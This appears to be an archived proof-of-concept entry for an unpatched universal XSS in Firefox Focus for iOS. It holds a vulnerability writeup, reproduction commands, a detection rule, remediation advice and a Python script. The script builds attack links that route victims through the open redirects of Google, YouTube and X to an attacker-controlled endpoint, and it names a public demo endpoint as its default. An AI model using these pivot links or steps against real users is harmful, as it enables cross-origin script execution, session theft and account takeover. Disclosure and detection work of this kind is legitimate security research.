PoC Archive PoC Archive
Critical unpatched

FirefUXSS: Universal XSS in Firefox Focus for iOS via Redirect-Scheme Validation Race Condition

by @RenwaX23 (V12 Security) · 2026-06-08

CVSS 9.3/10
Severity
Critical
Category
web
Affected product
Firefox Focus for iOS
Affected versions
Latest available version at time of testing (per upstream disclosure)
Disclosed
2026-06-08
Patch status
unpatched

Metadata

FieldValue
Date Added2026-06-08
Last Updated2026-06-08
Author / Researcher@RenwaX23 (V12 Security)
CVE / AdvisoryN/A
Categoryweb
SeverityCritical
CVSS Score9.3 (CVSSv3.1)
StatusUnpatched
TagsUXSS, XSS, race-condition, TOCTOU, redirect-validation, javascript-scheme, iOS, Firefox Focus
RelatedN/A

Affected Target

FieldValue
Software / SystemFirefox Focus for iOS
Versions AffectedLatest available version at time of testing (per upstream disclosure)
Language / PlatformiOS browser / WebKit-based mobile browsing context
Authentication RequiredNo
Network Access RequiredYes

Summary

FirefUXSS is a universal XSS issue in Firefox Focus for iOS where redirect-scheme validation can be bypassed via a race condition. A burst of benign redirects can desynchronize validation from navigation commit, allowing a final javascript: redirect to execute. The JavaScript then runs with the origin of the previously loaded page, enabling cross-origin script execution on high-value domains reached through open redirects.


Vulnerability Details

Root Cause

Firefox Focus performs dangerous-scheme validation for redirect targets, but the check is not atomic with navigation commit. This creates a TOCTOU window where the navigation pipeline can commit a redirect target before the javascript: scheme rejection is effectively enforced.

Attack Vector

An attacker lures a victim to an attacker-controlled page loaded in _self, pivots the browsing context through a target-origin open redirect, then triggers a rapid redirect chain ending in javascript:. If timing is favorable, the browser executes that final payload in the inherited origin context.

Impact

Successful exploitation gives attacker-controlled JavaScript execution in arbitrary target origins the victim traverses (for example, Google/X/YouTube/Reddit in the public PoC). This can enable session theft, account takeover, and unauthorized actions in authenticated sessions.


Environment / Lab Setup

OS:          iOS device (or simulator) with Firefox Focus installed
Target:      Firefox Focus for iOS (unpatched build)
Attacker:    Controlled web server hosting PoC page and redirect endpoint
Tools:       python3 (link generator), optional PHP web host, HTTPS endpoint

Setup Steps

1
python3 exploit.py --attacker-url 'https://attacker.example/poc.php?redirect=1'

Proof of Concept

Step-by-Step Reproduction

  1. Host the PoC endpoint controlled by the researcher (for example poc.php?redirect=1).

    1
    
    php -S 0.0.0.0:8080
    
  2. Generate/open a pivot URL that routes through a target-origin redirect.

    1
    
    python3 exploit.py --attacker-url 'https://attacker.example/poc.php?redirect=1'
    
  3. Open one generated URL in Firefox Focus for iOS and allow navigation in _self; the final redirect races into a javascript: URI and may execute in inherited target origin.

Exploit Code

See exploit.py in this folder for a minimal pivot-link generator.

1
2
3
4
from exploit import build_pivot_links

links = build_pivot_links("https://attacker.example/poc.php?redirect=1")
print(links["google"])

Expected Output

[+] Generated FirefUXSS pivot links:
  - google: https://www.google.com/url?q=...
  - youtube: https://www.youtube.com/redirect?q=...
  - x: https://x.com/safety/unsafe_link_warning?unsafe_link=...

[+] If vulnerable, final JavaScript executes in inherited target origin context.

Screenshots / Evidence

  • screenshots/ — add reproduction video or browser-origin evidence from authorized testing

Detection & Indicators of Compromise

- Spikes of chained 30x redirects from a single client to the same attacker path.
- Location headers resolving to javascript: payloads after redirect bursts.
- Suspicious outbound pivots through known open-redirect endpoints that return to attacker infrastructure.

SIEM / IDS Rule (example):

alert http any any -> $HTTP_SERVERS any (
  msg:"Possible Firefox Focus redirect-scheme race exploitation";
  content:"Location|3a 20|javascript:"; http_header;
  sid:900260608; rev:1;
)

Remediation

ActionDetail
PatchApply Mozilla fix once available for Firefox Focus iOS redirect handling
WorkaroundAvoid opening untrusted redirect chains and block attacker-controlled intermediary domains where possible
Config HardeningReject javascript:/data:/file: redirect targets at multiple layers with atomic validation+commit controls

References


Notes

Auto-ingested from https://github.com/v12-security/pocs/tree/main/firefox on 2026-06-08.

Disclosure timeline in upstream notes indicates report submission on 2025-07-04 and public release on 2026-06-08 after no patch was available.

exploit.py
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
#!/usr/bin/env python3
"""Generate pivot links used in the FirefUXSS Firefox Focus iOS PoC."""

from __future__ import annotations

import argparse
from urllib.parse import quote


def build_pivot_links(attacker_url: str) -> dict[str, str]:
    """Return redirect-based pivot links for major origins used by the PoC."""
    encoded = quote(attacker_url, safe="")
    return {
        "google": (
            "https://www.google.com/url"
            f"?q={encoded}&sa=D&sntz=1&usg=AOvVaw1uB0j5rrgN2xkfoBgA9G0T"
        ),
        "youtube": f"https://www.youtube.com/redirect?q={encoded}",
        "x": f"https://x.com/safety/unsafe_link_warning?unsafe_link={encoded}",
    }


def main() -> None:
    parser = argparse.ArgumentParser(
        description="Generate FirefUXSS pivot URLs for authorized testing."
    )
    parser.add_argument(
        "--attacker-url",
        default="https://firefoxuxss.v12.sh/poc.php?redirect=1",
        help="Attacker-controlled PoC endpoint (default: public demo endpoint)",
    )
    args = parser.parse_args()

    links = build_pivot_links(args.attacker_url)

    print("[+] Generated FirefUXSS pivot links:")
    for name, url in links.items():
        print(f"  - {name}: {url}")

    print("\n[!] Open one URL in Firefox Focus for iOS using authorized test targets only.")


if __name__ == "__main__":
    main()